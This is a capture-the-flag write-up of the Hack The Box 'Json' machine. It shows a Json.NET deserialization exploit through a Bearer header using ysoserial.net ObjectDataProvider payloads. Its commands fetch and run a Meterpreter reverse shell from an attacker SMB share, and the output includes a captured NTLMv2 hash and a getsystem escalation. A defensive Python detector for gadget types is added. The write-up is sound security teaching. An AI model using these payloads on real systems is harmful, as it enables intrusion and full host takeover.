Hack The Box - Json Insecure Deserialization


title: Hack The Box - Json Insecure Deserialization
author: World'sEnd
layout: true
categories: Vulnerability Topics
tags: Vulnerability notes


Hack The Box - json

The target IP is 10.10.10.158.

# Nmap 7.92 scan initiated Sat Apr  9 17:49:41 2022 as: nmap -sV -sC -Pn -T4 -p- -oA nmap.txt 10.10.10.158
Nmap scan report for 10.10.10.158
Host is up (0.40s latency).
Not shown: 65521 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
80/tcp open http Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Json HTB
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: JSON, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:6f:ff (VMware)
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.0.2:
|_ Message signing enabled but not required
| smb2-time:
| date: 2022-04-09T10:03:30
|_ start_date: 2022-04-09T09:49:04

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 9 18:03:40 2022 -- 1 IP address (1 host up) scanned in 839.40 seconds

Port 21 does not allow anonymous login, and there are no known exploits for the FTP daemon:

searchsploit FileZilla ftpd    
Exploits: No Results
Shellcodes: No Results

I visited port 80 and, amusingly, at the moment the page loads it shows a normal page:

but right after that it redirects to a login page:

So wouldn't intercepting the redirect that fires when the page is entered give me unauthorized access? Unfortunately, when I tried it, for some unknown reason it didn't work, though in theory it should. Probably some environment issue.

I don't need to dwell on whether that unauthorized access is exploitable, though, because admin/admin logs straight in. A quick look at the main page shows nothing worth clicking, and it even has a fake button to fool me: the Generate Report button at the top right sends no request and goes nowhere, it just teleports in place. Fine, the whole page is fake; even the search box is fake and the message notifications are fake. Apart from Charts and Tables on the left, which bring up a 404 page, everything on the page is fake.

Perhaps Wappalyzer, at least, is real:

IIS as the server component, a Windows Server OS and an ASP.NET environment. Time to brute-force paths:

[18:21:23] Starting: 
[18:21:27] 403 - 312B - /%2e%2e//google.com
[18:21:27] 301 - 146B - /js -> http://10.10.10.158/js/
[18:21:39] 403 - 3KB - /Trace.axd
[18:21:40] 403 - 312B - /\..\..\..\..\..\..\..\..\..\etc\passwd
[18:22:05] 301 - 147B - /css -> http://10.10.10.158/css/
[18:22:11] 301 - 149B - /files -> http://10.10.10.158/files/
[18:22:11] 403 - 1KB - /files/
[18:22:15] 301 - 147B - /img -> http://10.10.10.158/img/
[18:22:15] 200 - 39KB - /index.html
[18:22:17] 400 - 4KB - /jolokia/exec/java.lang:type=Memory/gc
[18:22:17] 400 - 4KB - /jolokia/write/java.lang:type=Memory/Verbose/true
[18:22:17] 400 - 4KB - /jolokia/search/*:j2eeType=J2EEServer,*
[18:22:17] 400 - 4KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmSystemProperties
[18:22:17] 400 - 4KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/help/*
[18:22:17] 400 - 4KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jfrStart/filename=!/tmp!/foo
[18:22:17] 400 - 4KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/compilerDirectivesAdd/!/etc!/passwd
[18:22:17] 400 - 4KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/jvmtiAgentLoad/!/etc!/passwd
[18:22:17] 400 - 4KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/output=!/tmp!/pwned
[18:22:17] 400 - 4KB - /jolokia/exec/com.sun.management:type=DiagnosticCommand/vmLog/disable
[18:22:17] 400 - 4KB - /jolokia/read/java.lang:type=Memory/HeapMemoryUsage/used
[18:22:17] 403 - 1KB - /js/
[18:22:17] 400 - 4KB - /jolokia/read/java.lang:type=*/HeapMemoryUsage
[18:22:19] 200 - 4KB - /login.html
[18:22:47] 301 - 149B - /views -> http://10.10.10.158/views/

Every 301 page looks like this:

But the box is tagged deserialization, and the only deserialization point I have found so far is the login form, because it has the telltale Remember me checkbox and it returned an equally telltale Set-Cookie:

It isn't Shiro, though; the cookie value looks like this:

eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=

Base64-decoded it is:

{"Id":1,"UserName":"admin","Password":"21232f297a57a5a743894a0e4a801fc3","Name":"User Admin HTB","Rol":"Administrator"}

The password is stored and transmitted as an unsalted MD5 hash, and the token is nothing more than base64 of the user record, with no visible signature or MAC protecting it:

echo -n admin | md5sum
21232f297a57a5a743894a0e4a801fc3

Right after that I capture a second request:

GET /api/Account/ HTTP/1.1
Host: 10.10.10.158
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Bearer: eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=
DNT: 1
Connection: close
Referer: http://10.10.10.158/index.html
Cookie: OAuth2=eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0=

Its Bearer header and the Cookie value look identical (note that Bearer here is a custom request header name, not the standard Authorization: Bearer scheme). I tried changing the cookie value; the server replies with the following:

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 09 Apr 2022 16:04:17 GMT
Connection: close
Content-Length: 119

{"Id":1,"UserName":"admin","Password":"21232f297a57a5a743894a0e4a801fc3","Name":"User Admin HTB","Rol":"Administrator"}

Not useful: however I change the cookie, it replies with the packet above. The Bearer header is another matter; any change to it makes the server throw an error:

HTTP/1.1 500 Internal Server Error
Cache-Control: no-cache
Pragma: no-cache
Content-Type: application/json; charset=utf-8
Expires: -1
Server: Microsoft-IIS/8.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 09 Apr 2022 16:04:58 GMT
Connection: close
Content-Length: 132

{"Message":"An error has occurred.","ExceptionMessage":"Invalid format base64","ExceptionType":"System.Exception","StackTrace":null}

So the deserialization injection point is the Bearer header, and the exception text shows the value is base64-decoded server-side before it reaches the deserializer. I then found the following toolkit:

https://github.com/frohoff/ysoserial

(That link is the Java original. The ysoserial.exe used below, with its Json.Net formatter and ObjectDataProvider gadget, is the .NET port, https://github.com/pwntester/ysoserial.net.)

It is an exe, but I can run it on Windows to generate the payload and then copy the result over to Kali:

.\ysoserial.exe -f Json.Net -o base64 -c "ping 10.10.16.9" -g ObjectDataProvider
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

Decoded it looks like this. ysoserial.net emits single-quoted JSON, which Json.NET accepts; the $type discriminators are what a deserializer configured with TypeNameHandling acts on, so the server instantiates ObjectDataProvider, which calls Process.Start("cmd", "/c ping 10.10.16.9"):

{
  '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
  'MethodName':'Start',
  'MethodParameters':{
    '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
    '$values':['cmd', '/c ping 10.10.16.9']
  },
  'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}

I can listen for ICMP locally to verify whether the exploit worked:

tcpdump -i tun0 icmp and src 10.10.10.158

Then I build the following request and send it to the target; in my testing it made no difference whether the cookie was present or not:

GET /api/Account/ HTTP/1.1
Host: 10.10.10.158
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Bearer: 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
DNT: 1
Connection: close
Referer: http://10.10.10.158/index.html
Cookie: OAuth2=

tcpdump picked up ICMP echo requests from the target:

tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
10:27:37.302600 IP 10.10.10.158 > 10.10.16.9: ICMP echo request, id 1, seq 5, length 40
10:27:38.225115 IP 10.10.10.158 > 10.10.16.9: ICMP echo request, id 1, seq 6, length 40
10:27:39.241911 IP 10.10.10.158 > 10.10.16.9: ICMP echo request, id 1, seq 7, length 40
10:27:40.256337 IP 10.10.10.158 > 10.10.16.9: ICMP echo request, id 1, seq 8, length 40

So it looks like exploitation succeeded, and indeed that's what happened. Now I can replace the ping command with whatever command I want to run. I tried using wget to pull a payload or nc onto the target, but as soon as I added the -O parameter it sank without a trace, no response at all, an unknown error. That also meant I had no way of knowing where on the target nc and the payload had ended up. So I set up an SMB share instead and had the target run the payload from my share. First, start the matching handler in Metasploit locally:

msf-pro exploit(multi/handler) > set LhOST 10.10.16.9
LhOST => 10.10.16.9
msf-pro exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf-pro exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf-pro exploit(multi/handler) > run

and generate the matching payload:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.9 LPORT=4444 -f exe > shell.exe

then start an SMB share in the directory containing the generated payload:

impacket-smbserver share .
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed

Generate the payload with ysoserial again:

.\ysoserial.exe -f Json.Net -o base64 -c "net use \\10.10.16.9\share & \\10.10.16.9\share\shell.exe" -g ObjectDataProvider

which gives the following base64-encoded payload:

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

It can be decoded to check it for errors (note how every backslash in the UNC path is doubled once it sits inside a JSON string):

{
  '$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',
  'MethodName':'Start',
  'MethodParameters':{
    '$type':'System.Collections.ArrayList, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089',
    '$values':['cmd', '/c net use \\\\10.10.16.9\\share & \\\\10.10.16.9\\share\\shell.exe']
  },
  'ObjectInstance':{'$type':'System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089'}
}

Then send it through Burp Suite. If the following appears in the SMB server's output, the target connected to my share. The userpool::JSON:... line is a Net-NTLMv2 challenge/response captured by impacket-smbserver; it could be cracked offline with hashcat (mode 5600) had the code-execution route failed, and it already reveals that the web application runs as the local account JSON\userpool:

[*] Incoming connection (10.10.10.158,49712)
[*] AUTHENTICATE_MESSAGE (JSON\userpool,JSON)
[*] User JSON\userpool authenticated successfully
[*] userpool::JSON:aaaaaaaaaaaaaaaa:1975aeb1e7ccda72722d6f7219a9ff7a:010100000000000080756f58944cd80148b2b38ce56d992300000000010010004a006400780074004f0044006a007200030010004a006400780074004f0044006a0072000200100076006b004b006d0047006900590058000400100076006b004b006d0047006900590058000700080080756f58944cd80106000400020000000800300030000000000000000000000000300000dfbb05e9e77b2854b41933c307abd332ab641a0af5e539c003d77a77ac01757d0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e00310030002e00310036002e003900000000000000000000000000

Metasploit then receives the Meterpreter session:

[*] Started reverse TCP handler on 10.10.16.9:4444 
[*] Sending stage (175174 bytes) to 10.10.10.158
[*] Meterpreter session 1 opened (10.10.16.9:4444 -> 10.10.10.158:49713 ) at 2022-04-10 12:35:26 +0800

meterpreter >

Windows has a great many privilege-escalation mechanisms and I have written about plenty of them before, so I won't repeat them here. On this box getsystem alone yields SYSTEM; its named-pipe impersonation techniques need SeImpersonatePrivilege, which accounts running web application code commonly hold, and the success below shows userpool has it:

meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
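Before the flags, the same chain from the defender's side. The request that started it is easy to tell apart from a legitimate one: a user record never needs a $type discriminator, and the server's own "Invalid format base64" error shows exactly the decode step a reverse proxy, WAF rule or log parser can repeat. The following Python is an added example, not code from the original page or from the target application: it decodes a Bearer value, collects every $type it contains and classifies the token. Json.NET accepts single-quoted JSON, which is what ysoserial.net emits and what Python's strict json module rejects, so the classifier falls back to a regex scan when strict parsing fails rather than calling the token clean. The sample tokens are constructed here except LEGIT, which is the real admin cookie from this write-up; the function names and the GADGET_TYPES list are mine.

```python
import base64
import binascii
import json
import re

# Type names used by the Json.NET gadget seen in this write-up; extend the tuple with
# the other ysoserial.net Json.Net gadget types relevant to your environment.
GADGET_TYPES = ("System.Windows.Data.ObjectDataProvider", "System.Diagnostics.Process")

# Json.NET also accepts single-quoted strings (ysoserial.net's default output), which
# the strict json module rejects, so keep a regex fallback for "$type" values.
TYPE_RE = re.compile(r"""["']\$type["']\s*:\s*["']([^"']+)["']""")


def collect_types(node):
    """Recursively collect every "$type" discriminator in a parsed JSON document."""
    found = []
    if isinstance(node, dict):
        for key, value in node.items():
            if key == "$type" and isinstance(value, str):
                found.append(value)
            else:
                found.extend(collect_types(value))
    elif isinstance(node, list):
        for item in node:
            found.extend(collect_types(item))
    return found


def inspect_bearer(token):
    """Classify a Bearer value the way the server's deserializer will see it."""
    try:
        raw = base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        # The server answers this case with HTTP 500 "Invalid format base64".
        return {"verdict": "undecodable", "types": [], "strict_json": False}
    try:
        types = collect_types(json.loads(raw))
        strict = True
    except ValueError:
        # Not strict JSON (e.g. single quotes) but Json.NET may still parse it.
        types = TYPE_RE.findall(raw)
        strict = False
    short_names = {t.split(",")[0].strip() for t in types}
    if short_names & set(GADGET_TYPES):
        verdict = "gadget"
    elif types:
        verdict = "suspicious"  # a plain user record never carries a type discriminator
    else:
        verdict = "clean"
    return {"verdict": verdict, "types": types, "strict_json": strict}


def scan(samples):
    """Return {label: verdict} for a batch of header values, e.g. pulled from proxy logs."""
    return {label: inspect_bearer(value)["verdict"] for label, value in samples.items()}


# Samples. LEGIT is the real admin cookie from the write-up; the rest are constructed here.
LEGIT = "eyJJZCI6MSwiVXNlck5hbWUiOiJhZG1pbiIsIlBhc3N3b3JkIjoiMjEyMzJmMjk3YTU3YTVhNzQzODk0YTBlNGE4MDFmYzMiLCJOYW1lIjoiVXNlciBBZG1pbiBIVEIiLCJSb2wiOiJBZG1pbmlzdHJhdG9yIn0="
YSOSERIAL_STYLE = base64.b64encode(
    b"{'$type':'System.Windows.Data.ObjectDataProvider, PresentationFramework, "
    b"Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35',"
    b"'MethodName':'Start','ObjectInstance':{'$type':'System.Diagnostics.Process, System'}}"
).decode()
TYPED_BUT_UNKNOWN = base64.b64encode(
    b'{"$type":"Acme.Models.User, Acme","Id":1,"UserName":"admin"}'
).decode()
BROKEN = "this is not base64!"

if __name__ == "__main__":
    for label, verdict in scan({"legit": LEGIT, "ysoserial": YSOSERIAL_STYLE,
                                "typed": TYPED_BUT_UNKNOWN, "broken": BROKEN}).items():
        print(label, verdict)
```

The useful property is that the "gadget" verdict survives the single-quote form: a detector that only ran json.loads would report the real ysoserial.net payload as unparseable and move on, which is the same blind spot the application itself does not have.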

User.txt:

c:\Users\userpool\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is B219-32A3

Directory of c:\Users\userpool\Desktop

05/22/2019 05:07 PM <DIR> .
05/22/2019 05:07 PM <DIR> ..
05/22/2019 05:07 PM 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 20,318,572,544 bytes free

c:\Users\userpool\Desktop>type user.txt
type user.txt

Root.txt:

c:\Users\superadmin>cd desktop
cd desktop

c:\Users\superadmin\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is B219-32A3

Directory of c:\Users\superadmin\Desktop

03/17/2021 07:59 AM <DIR> .
03/17/2021 07:59 AM <DIR> ..
05/22/2019 05:06 PM 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 20,318,568,448 bytes free

c:\Users\superadmin\Desktop>type root.txt
type root.txt

